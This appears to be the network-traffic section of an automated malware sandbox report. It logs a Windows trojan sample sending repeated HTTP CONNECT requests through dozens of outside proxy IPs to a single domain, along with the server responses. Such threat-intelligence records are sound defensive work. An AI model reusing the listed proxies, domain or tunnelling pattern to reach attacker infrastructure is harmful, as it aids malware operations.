                                                                                Feb 23, 2024 14:28:25.679132938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                153192.168.2.85048046.51.249.13531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.236124039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.538857937 CET146INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: ASP.NET
                                                                                Server: squid/3.5.28
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                154192.168.2.850407183.89.40.23210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.244565010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                155192.168.2.850662172.64.152.98805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.246634007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.334444046 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                156192.168.2.850604104.238.111.107154195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.249986887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                157192.168.2.85060182.113.157.122312805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.251710892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                158192.168.2.850449116.199.170.1741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.252423048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                159192.168.2.85078043.157.32.2414435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.257843018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                160192.168.2.85078343.157.32.2414435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.259448051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                161192.168.2.85078643.157.32.2414435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.260976076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                162192.168.2.85060772.210.208.10141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.266474962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                163192.168.2.850689104.16.108.204805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.267165899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.354441881 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                164192.168.2.8505648.213.128.6115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.283550024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.575722933 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                165192.168.2.85058620.204.190.25431295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.293545961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.637346029 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                166192.168.2.85070054.39.50.68201325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.299905062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.616597891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.944755077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                167192.168.2.850633185.225.232.191805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.303829908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.291707993 CET830INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Server: Apache/2.4.57 (Debian)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                168192.168.2.850750104.18.81.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.315983057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.403827906 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                169192.168.2.85056747.250.46.217805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.318078995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.991590977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.960374117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882678032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.882755995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                170192.168.2.84988798.188.47.13241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.329822063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                171192.168.2.850764104.23.107.172805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.332444906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.420514107 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                172192.168.2.85077845.12.31.104805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.340797901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.428584099 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                173192.168.2.85061385.12.214.148805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.343888998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                174192.168.2.850599190.128.228.182805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.345597982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.599561930 CET1286INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Server: Apache/2.4.56 (Ubuntu)
                                                                                Set-Cookie: PHPSESSID=ai6g9jn0f8et5ofjar59t88efq; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 5101
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                Feb 23, 2024 14:28:23.599750042 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                Feb 23, 2024 14:28:23.600003958 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
